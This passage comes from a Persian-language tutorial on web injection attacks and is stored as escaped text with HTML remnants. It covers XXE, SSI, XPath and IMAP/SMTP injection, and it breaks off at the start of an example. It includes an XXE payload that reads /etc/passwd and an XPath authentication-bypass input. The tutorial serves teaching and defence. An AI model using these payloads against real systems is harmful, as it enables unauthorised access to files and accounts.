\u0641\u0631\u0636 \u06a9\u0646\u06cc\u062f \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u06cc\u06a9 \u0641\u0631\u0648\u0634\u06af\u0627\u0647 \u0622\u0646\u0644\u0627\u06cc\u0646\u060c \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0635\u0641\u062d\u0647\u200c\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u06cc\u06a9 \u0645\u062d\u0635\u0648\u0644\u060c \u0627\u0632 \u06a9\u062f XML \u0645\u0634\u0627\u0628\u0647 \u0632\u06cc\u0631 \u06a9\u0647 \u0627\u0632 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u062f\u0631\u06cc\u0627\u0641\u062a \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<stockCheck><productId>381<\/productId><\/stockCheck><\/pre>\n
\u062d\u0627\u0644\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0645\u062a\u0648\u062c\u0647 \u0639\u062f\u0645 \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0635\u062d\u06cc\u062d\u060c \u062f\u0631 \u0627\u06cc\u0646 \u0642\u0633\u0645\u062a \u0627\u0632 \u0628\u0631\u0646\u0627\u0645\u0647 \u0634\u062f\u0647 \u0648 \u0627\u06cc\u0646 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0631\u0627 \u0628\u0635\u0648\u0631\u062a \u062f\u0633\u062a\u0648\u0631 XML \u0632\u06cc\u0631 \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/p>\n
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:\/\/\/etc\/passwd\"> ]>\r\n<stockCheck><productId>&xxe;<\/productId><\/stockCheck><\/pre>\n
\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u06cc \u06cc\u0627\u062f \u0634\u062f\u0647 \u0628\u0647 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u062f\u0633\u062a\u0648\u0631 \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0647 \u0628\u0647 \u0627\u062c\u0631\u0627 \u062f\u0631 \u0622\u0645\u062f\u0647 \u0648 \u0641\u0627\u06cc\u0644 \u0633\u06cc\u0633\u062a\u0645\u06cc passwd \u0631\u0627 \u0628\u0647 \u062c\u0627\u06cc \u0635\u0641\u062d\u0647\u200c\u06cc \u0645\u062d\u0635\u0648\u0644\u060c \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f. \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06af\u0641\u062a \u06a9\u0647 \u0628\u0647 \u0639\u0644\u062a \u0648\u062c\u0648\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06cc XML Injection\u060c \u0627\u0645\u06a9\u0627\u0646 \u062d\u0645\u0644\u0647\u200c\u06cc Local File Inclusion \u0646\u06cc\u0632\u060c \u0628\u0631\u0627\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0648\u062c\u0648\u062f \u0622\u0645\u062f.<\/p>\n
\u062d\u0645\u0644\u0647 <\/strong>SSI Injection<\/strong><\/h4>\nSSI\u060c \u0645\u062e\u0641\u0641 \u0639\u0628\u0627\u0631\u062a Server Side Includes \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u0627\u0634\u0627\u0631\u0647 \u0628\u0647 \u062f\u0633\u062a\u0648\u0631\u0627\u0644\u0639\u0645\u0644\u200c\u0647\u0627\u06cc\u06cc \u062f\u0627\u0631\u062f\u060c \u06a9\u0647 \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0628\u060c \u0628\u0631\u0627\u06cc \u062f\u0627\u0634\u062a\u0646 \u0635\u0641\u062d\u0627\u062a HTML\u060c \u0628\u0627 \u0645\u062d\u062a\u0648\u0627\u06cc\u06cc \u067e\u0648\u06cc\u0627 \u0628\u0647 \u0645\u0627 \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0645\u0627 \u0628\u0647 \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u200c \u0646\u06cc\u0627\u0632 \u062f\u0627\u0631\u06cc\u0645 \u06a9\u0647 \u062f\u0627\u0631\u0627\u06cc \u0635\u0641\u062d\u0627\u062a \u0645\u062a\u0639\u062f\u062f\u06cc \u0628\u0627\u0634\u062f \u0648 \u0647\u0631 \u06a9\u062f\u0627\u0645 \u0627\u0632 \u0635\u0641\u062d\u0627\u062a\u060c \u062f\u0627\u0631\u0627\u06cc \u062a\u063a\u06cc\u06cc\u0631\u06cc \u06a9\u0648\u0686\u06a9 \u062f\u0631 \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u062e\u0648\u062f\u060c \u0646\u0633\u0628\u062a \u0628\u0647 \u0635\u0641\u062d\u0647\u200c\u06cc \u062f\u06cc\u06af\u0631 \u0628\u0627\u0634\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u062c\u0632\u0626\u06cc \u062f\u0631 \u06a9\u062f html \u0647\u0631 \u06a9\u062f\u0627\u0645 \u0627\u0632 \u0635\u0641\u062d\u0627\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0639\u0645\u0644\u06cc \u062f\u0634\u0648\u0627\u0631 \u0628\u0627\u0634\u062f. \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627\u060c SSI \u0628\u0647 \u06a9\u0645\u06a9 \u0645\u0627 \u0622\u0645\u062f\u0647 \u0648 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0635\u0641\u062d\u0627\u062a \u0631\u0627 \u0628\u0647 \u0647\u0631\u06a9\u062f\u0627\u0645 \u0648\u0627\u0631\u062f \u06a9\u0646\u062f.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u0627\u0632 \u0646\u0638\u0631 \u0634\u0628\u0627\u0647\u062a\u060c \u0622\u0646 \u0631\u0627 \u0628\u0627 CGI \u0645\u0642\u0627\u06cc\u0633\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06a9\u0647 \u06cc\u06a9 \u0632\u0628\u0627\u0646 \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a\u06cc \u0633\u0645\u062a\u200c\u0633\u0631\u0648\u0631 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u062f\u0631 \u0648\u0627\u0642\u0639\u060c \u067e\u06cc\u0634 \u0627\u0632 \u0622\u0645\u0627\u062f\u0647 \u0634\u062f\u0646 \u0635\u0641\u062d\u0647\u200c\u06cc \u06af\u0641\u062a\u0647 \u0634\u062f\u0647\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u0644\u0639\u0645\u0644 \u200c\u0647\u0627\u06cc SSI\u060c \u062a\u0648\u0633\u0637 \u0648\u0628\u200c\u0633\u0631\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u067e\u0631\u062f\u0627\u0632\u0634 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f. \u0632\u0645\u0627\u0646\u06cc \u0627\u0645\u06a9\u0627\u0646 \u062d\u0645\u0644\u0647\u200c\u06cc SSI Injection \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f \u06a9\u0647 \u0628\u062e\u0634\u06cc \u0627\u0632 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0642\u0627\u0628\u0644 \u06a9\u0646\u062a\u0631\u0644 \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u06a9\u0647 \u067e\u0627\u0633\u062e\u06cc \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0628\u0627 \u062f\u0633\u062a\u0648\u0631\u0627\u0644\u0639\u0645\u0644\u200c\u0647\u0627\u06cc SSI\u060c \u0645\u0648\u0631\u062f \u067e\u0631\u062f\u0627\u0632\u0634 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u0646\u062f. \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u062d\u0645\u0644\u0647\u200c\u06cc SSI \u0645\u0648\u0641\u0642\u06cc\u062a \u0622\u0645\u06cc\u0632 \u0628\u0627\u0634\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0627\u0645\u06a9\u0627\u0646 \u062a\u0632\u0631\u06cc\u0642 \u06a9\u062f\u0647\u0627\u06cc \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0631\u0627 \u0628\u0647 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u062f\u0647\u062f \u0648 \u0646\u062a\u0627\u06cc\u062c\u06cc \u0647\u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0647 XSS<\/a> \u0631\u0627 \u062f\u0631 \u0628\u0631 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f. \u0647\u0645\u0686\u0646\u06cc\u0646\u060c \u0628\u0633\u062a\u0647 \u0628\u0647 \u0633\u0627\u062e\u062a\u0627\u0631 \u0648\u0628\u200c\u0633\u0631\u0648\u0631\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u06cc\u0627 \u062d\u0645\u0644\u0647\u200c\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f\u060c \u062f\u0631 \u0633\u0631\u0648\u0631 \u0634\u0648\u062f \u0648 \u0636\u0631\u0628\u0627\u062a\u06cc \u0647\u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0647\u200c\u06cc OS Command Injection \u0631\u0627 \u062f\u0631 \u067e\u06cc \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f.<\/p>\n
\u0645\u062b\u0627\u0644:<\/p>\n
\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u0642\u0627\u0628\u0644\u06cc\u062a\u06cc \u062f\u0627\u0631\u062f \u06a9\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u067e\u0633 \u0627\u0632 \u0648\u0631\u0648\u062f \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062e\u0648\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0622\u062f\u0631\u0633 IP \u062e\u0648\u062f \u0631\u0627 \u0628\u0628\u06cc\u0646\u0646\u062f. \u0627\u06cc\u0646 \u0639\u0645\u0644 \u0628\u0627 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u062a\u0635\u0648\u06cc\u0631 \u0632\u06cc\u0631 \u062f\u0631 \u0628\u06a9\u200c\u0627\u0646\u062f \u0628\u0631\u0646\u0627\u0645\u0647 \u0635\u0648\u0631\u062a \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/p>\n
\u0646\u0641\u0648\u0630\u06af\u0631 \u067e\u0633 \u0627\u0632 \u0622\u0646 \u06a9\u0647 \u0627\u062d\u062a\u0645\u0627\u0644 \u0648\u062c\u0648\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc SSI Injection \u0631\u0627 \u062a\u0634\u062e\u06cc\u0635 \u0645\u06cc\u200c\u062f\u0647\u062f\u060c \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0641\u06cc\u0644\u062f \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n
<\/pre>\n
\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646\u06a9\u0647 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u062f\u0631 \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0647 \u200c\u062f\u0631\u0633\u062a\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u062f\u0633\u062a\u0648\u0631 \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0627\u062c\u0631\u0627 \u062f\u0631\u0622\u0645\u062f\u0647 \u0648 \u0641\u0627\u06cc\u0644 passwd \u0645\u0627\u0646\u0646\u062f \u062a\u0635\u0648\u06cc\u0631 \u0632\u06cc\u0631 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/p>\n
\u0627\u06cc\u0646 \u0645\u062b\u0627\u0644\u060c \u0646\u0645\u0648\u0646\u0647\u200c\u0627\u06cc \u0627\u0632 \u0627\u062c\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06cc Command Injection \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc SSI Injection \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a\u060c \u0645\u0646\u062c\u0631 \u062f\u0633\u062a\u0631\u0633\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0633\u0631\u0648\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a. \u0627\u0644\u0628\u062a\u0647 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u062f\u0631 \u0635\u0648\u0631\u062a \u0627\u062c\u0631\u0627 \u0634\u062f\u0646\u060c \u0628\u0647 \u0647\u0645\u06cc\u0646 \u0633\u0646\u0627\u0631\u06cc\u0648 \u062e\u0644\u0627\u0635\u0647 \u0646\u0634\u062f\u0647 \u0648 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u0686\u0646\u062f\u06cc\u0646 \u062d\u0645\u0644\u0647\u200c\u06cc \u062f\u06cc\u06af\u0631 \u0646\u06cc\u0632 \u0628\u0631\u0627\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0648\u062c\u0648\u062f \u062e\u0648\u0627\u0647\u062f \u0622\u0645\u062f.<\/p>\n
\u062d\u0645\u0644\u0647 XPath Injection<\/strong><\/h4>\nXPath \u06cc\u06a9 \u0632\u0628\u0627\u0646 \u0628\u0631\u0627\u06cc \u0645\u0633\u06cc\u0631\u200c\u062f\u0647\u06cc \u062f\u0631 \u067e\u0631\u0648\u0646\u062f\u0647\u200c\u0647\u0627\u06cc XML \u0627\u0633\u062a. \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06af\u0641\u062a \u06a9\u0647 \u0627\u06cc\u0646 \u0632\u0628\u0627\u0646 \u0645\u0634\u0627\u0628\u0647 \u0632\u0628\u0627\u0646 SQL \u06a9\u0647 \u0628\u0631\u0627\u06cc \u067e\u0631\u0633\u200c\u0648\u062c\u0648 \u062f\u0631 \u062f\u06cc\u062a\u0627\u0628\u06cc\u0633\u200c\u0647\u0627 \u0627\u0633\u062a\u060c \u0648\u0627\u0633\u0637\u0647 \u0628\u0631\u0627\u06cc \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0627 \u067e\u0631\u0648\u0646\u062f\u0647\u200c\u0647\u0627\u06cc XML \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u0627\u0644\u06af\u0648\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0646\u062e\u0633\u062a\u06cc\u0646 \u0628\u0627\u0631 \u062a\u0648\u0633\u0637 Amit Klein \u06a9\u0634\u0641 \u0634\u062f \u0648 \u0634\u0628\u0627\u0647\u062a \u0632\u06cc\u0627\u062f\u06cc \u0628\u0647 \u062d\u0645\u0644\u0647 SQL Injection<\/a> \u062f\u0627\u0631\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0632\u0645\u0627\u0646\u06cc \u0627\u062a\u0641\u0627\u0642 \u0645\u06cc\u200c\u0627\u0641\u062a\u062f \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0645\u062f\u0646\u0638\u0631 \u0627\u0632 XPath \u0628\u0631\u0627\u06cc \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0627 \u067e\u0631\u0648\u0646\u062f\u0647\u200c\u0647\u0627\u06cc xml\u060c \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f\u060c \u0627\u0645\u0627 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0631\u0648\u06cc \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631 \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f\u061b \u062f\u0631 \u0627\u06cc\u0646 \u0634\u0631\u0627\u06cc\u0637 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0646\u0641\u0648\u0630\u06af\u0631 \u0627\u0632 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0645\u0637\u0644\u0639 \u0634\u062f\u0647 \u0648 \u06a9\u0648\u0626\u0631\u06ccXPath \u00a0\u0631\u0627 \u0628\u0647 \u0634\u06cc\u0648\u0647 \u062e\u0648\u062f \u062a\u063a\u06cc\u06cc\u0631 \u0628\u062f\u0647\u062f \u06a9\u0647 \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a\u060c \u0628\u0633\u062a\u0647 \u0628\u0647 \u0646\u0642\u0637\u0647\u200c\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u060c \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0648\u062c\u0628 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u063a\u06cc\u0631\u200c\u0645\u062c\u0627\u0632\u060c \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u06cc\u0627 \u0627\u0646\u062c\u0627\u0645 \u06cc\u06a9 \u0639\u0645\u0644\u06cc\u0627\u062a \u0633\u0637\u062d \u0628\u0627\u0644\u0627 \u062a\u0648\u0633\u0637 \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0634\u0648\u062f.<\/p>\n
\u0645\u062b\u0627\u0644:<\/p>\n
\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u060c \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 XPath \u0632\u06cc\u0631 \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u062e\u0648\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n
\"\/\/Employee[UserName\/text()='\" & Request(\"UserName\") & \"' And Password\/text()='\" & Request(\"Password\") & \"']\"<\/pre>\n
\u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0628\u0631\u0627\u06cc \u0646\u0641\u0648\u0630 \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0641\u0631\u062f\u06cc \u062f\u06cc\u06af\u0631\u060c \u0628\u0647 \u062c\u0627\u06cc \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631\u060c \u0645\u0642\u0627\u062f\u06cc\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0648\u0627\u0631\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n
Username : test’ or 1=1 or ‘a’=’a <\/strong><\/em>
\n<\/em><\/strong>Password : test<\/strong><\/em><\/p>\n
\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06cc\u0627\u062f \u0634\u062f\u0647\u060c \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u067e\u06cc\u0644\u0648\u062f \u0648\u0627\u0631\u062f \u0634\u062f\u0647 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u062f\u0633\u062a\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n
\/\/Employee[UserName\/text()='test' or 1=1 or 'a'='a' And Password\/text()='test']<\/strong><\/em>\u00a0<\/strong><\/em><\/pre>\n
\u062f\u0631 \u0648\u0627\u0642\u0639 \u062f\u0633\u062a\u0648\u0631 \u06af\u0641\u062a\u0647 \u0634\u062f\u0647 \u0645\u0639\u0627\u062f\u0644 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0639\u0645\u0644 \u062e\u0648\u0627\u0647\u062f \u06a9\u0631\u062f:<\/em><\/p>\n
\/\/Employee[(UserName\/text()='test' or 1=1) or ('a'='a' And Password\/text()='test')]<\/strong><\/em><\/pre>\n
\u062f\u0631 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0646\u06cc\u0632\u060c \u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0647\u200c\u06cc \u062a\u0632\u0631\u06cc\u0642 \u00a0SQL\u060c \u062f\u0633\u062a\u0648\u0631 \u0634\u0631\u0637\u06cc \u0628\u0631\u0627\u06cc \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0628\u0631 \u0627\u0633\u0627\u0633 \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631\u060c \u0628\u0627 \u062f\u0648 \u0634\u0631\u0637 \u0647\u0645\u06cc\u0634\u0647 \u062f\u0631\u0633\u062a\u060c \u06cc\u0639\u0646\u06cc 1=1 \u0648 \u2018a\u2019=\u2019a\u2019 \u062a\u063a\u06cc\u06cc\u0631 \u0646\u0645\u0648\u062f\u0647 \u0648 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0641\u0631\u062f\u06cc \u062f\u06cc\u06af\u0631 \u0646\u0641\u0648\u0630 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/p>\n
\u062d\u0645\u0644\u0647 <\/strong>IMAP SMTP Injection<\/strong><\/h4>\n
\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0627\u0632 Mail Server \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0646\u0645\u0648\u062f\u0647 \u06cc\u0627 \u0628\u0647 \u0635\u0648\u0631\u062a \u06a9\u0644\u06cc \u0646\u0642\u0637\u0647\u200c\u06cc \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0645\u0633\u06cc\u0631\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0622\u0646 \u0642\u0627\u0628\u0644\u06cc\u062a \u062a\u0632\u0631\u06cc\u0642 \u062f\u0633\u062a\u0648\u0631\u0627\u062a IMAP\/SMTP \u0628\u0647 Mail Server \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u0648 \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0645\u06cc\u200c\u0634\u0648\u062f. \u062f\u0631 \u0635\u0648\u0631\u062a \u0627\u062c\u0631\u0627 \u0634\u062f\u0646 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0633\u062a\u0647 \u0628\u0647 \u062a\u0632\u0631\u06cc\u0642 \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647\u060c \u0646\u062a\u0627\u06cc\u062c \u0645\u062e\u062a\u0644\u0641\u06cc \u0631\u0627 \u062f\u0631 \u0628\u0631 \u062e\u0648\u0627\u0647\u062f \u062f\u0627\u0634\u062a. \u0646\u0645\u0648\u0646\u0647 \u0647\u0627\u06cc\u06cc \u0627\u0632 \u0631\u0648\u0634\u200c\u0647\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0639\u0628\u0627\u0631\u062a\u0646\u062f \u0627\u0632 :<\/p>\n
\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u067e\u0631\u0648\u062a\u06a9\u0644 IMAP\/SMTP<\/p>\n
\n
\u062f\u0648\u0631 \u0632\u062f\u0646 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647<\/li>\n
\u062f\u0648\u0631 \u0632\u062f\u0646 \u062a\u062f\u0627\u0628\u06cc\u0631 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0636\u062f \u0627\u062a\u0648\u0645\u0627\u062a\u06cc\u06a9\u200c\u0633\u0627\u0632\u06cc<\/li>\n
\u0627\u0641\u0634\u0627\u0621 \u0627\u0637\u0644\u0627\u0639\u0627\u062a<\/li>\n
\u0627\u06cc\u062c\u0627\u062f \u0647\u0631\u0632\u0646\u0627\u0645\u0647<\/li>\n<\/ul>\n
$\"\"$ <\/p>\n
\u0645\u062b\u0627\u0644:<\/p>\n
